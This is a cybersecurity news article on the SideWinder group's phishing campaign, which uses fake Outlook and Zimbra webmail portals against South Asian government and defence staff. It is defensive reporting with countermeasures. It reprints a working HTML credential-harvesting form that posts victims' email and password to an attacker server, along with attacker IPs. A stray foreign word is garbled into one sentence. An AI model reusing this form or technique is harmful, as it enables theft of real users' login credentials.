Cyber Security News

SideWinder Hacker Group Hosting Fake Outlook/Zimbra Portals to Steal Login Credentials

APT SideWinder, a state-sponsored threat actor long associated with espionage across South Asia, has recently launched a campaign deploying phishing portals that mimic legitimate Outlook and Zimbra webmail services.

Emerging in mid-2025, this operation uses free hosting platforms such as Netlify, pages.dev, and workers.dev to serve fake login pages tailored to government and military targets in Pakistan, Nepal, Sri Lanka, Bangladesh, and Myanmar.

By exploiting maritime and defense-themed lure documents, SideWinder not only harvests user credentials via direct POST requests but also stages malware in exposed directories for subsequent retrieval.

Beginning in August 2025, Hunt.io telemetry observed rapid domain churn—new phishing sites appeared every three to five days—underscoring a high operational tempo.

Many pages spoofed the Directorate General of Defense Purchases (DGDP) in Bangladesh, offering “Secured File” portals that prompted victims for email credentials under the guise of accessing Turkish defense equipment details.

Concurrently, Nepal’s Ministry of Finance staff received invitations to view PDF decoys titled “सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf,” which redirected to a counterfeit Outlook login hosted on Netlify (98.84.224.111).

Fake Outlook webmail login page uncovered by Hunt.io, targeting Nepal’s Ministry of Finance and hosted on Netlify (Source – Hunt.io)

Hunt.io analysts noted the malware’s ability to blend social engineering with simple, effective credential collection.

In one SUPARCO-targeted site, JavaScript logic encodes the victim’s email in Base64 before redirecting to a secondary phishing page, then overlays a reload prompt to capture fresh inputs.

This staged redirection and obfuscation both tracks sessions and thwarts casual inspection.

JavaScript logic from the SUPARCO phishing kit showing Base64 encoding of the victim’s email and staged redirection (Source – Hunt.io)

The infection mechanism underpinning these fake portals relies on direct form submissions to attacker-controlled servers rather than client-side malware payloads.

A typical HTML form observed in the SUPARCO phishing kit posts captured credentials to the endpoint https://technologysupport.help/1pac.php:-

<form method="POST" action="https://technologysupport.help/1pac.php">
  <input type="hidden" name="inbox" value="Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs=">
  <label for="email">Email:</label>
  <input type="email" id="email" name="user_email" required>
  <label for="pass">Password:</label>
  <input type="password" id="pass" name="user_pass" required>
  <button type="submit">Sign In</button>
</form>

The hidden inbox field carries a Base64-encoded address to correlate stolen credentials with specific campaigns.

Once harvested, these credentials feed into broader espionage workflows, granting SideWinder access to restricted networks or facilitating follow-on malware deployment from open directories at IPs such as 47.236.177.123 and 31.14.142.50.

By hosting portals on widely used, trusted platforms, SideWinder evades simple domain-based blocks and leverages rapid redeployment once URLs are taken down.

Countermeasures should include continuous monitoring of free hosting domains, advanced filtering of form POST requests to unknown servers, and user training to recognize document-based lures tied to login prompts. 开心 with network segmentation and enforced multi-factor authentication, organizations can limit credential-based intrusions even when phishing attempts succeed.

Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Hackers Target AI Infrastructure With RCE, Prompt Injection and API Key Theft

Hackers are actively probing AI systems, turning exposed gateways and agent tools into routes for…

3 hours ago

Hackers Make Phishing Pages Change Their Code Every Time Someone Opens Them

Hackers are making some phishing pages harder to track by changing the code delivered to…

4 hours ago

Iran-Linked Hackers Reportedly Knock UK Power Plant Offline for Four Days

A cyber incident reportedly forced a British power plant to halt operations for about four…

5 hours ago

Russian Hackers Use New HOOKEDGE Malware to Spy on European Defense and Diplomatic Targets

Russian hackers have used a new backdoor called HOOKEDGE to target defense manufacturers, government bodies,…

5 hours ago

Ransomware Gang Claims AI Can Analyze 700GB of Stolen Data Every Hour

TITAN ransomware is pairing file encryption with an ambitious claim: artificial intelligence that can sort…

5 hours ago

Hackers Compromise Hundreds of WordPress Sites to Deploy Amatera Stealer via ClickFix

A fake student resume is being used to place a remote-access tool on researchers’ Windows…

7 hours ago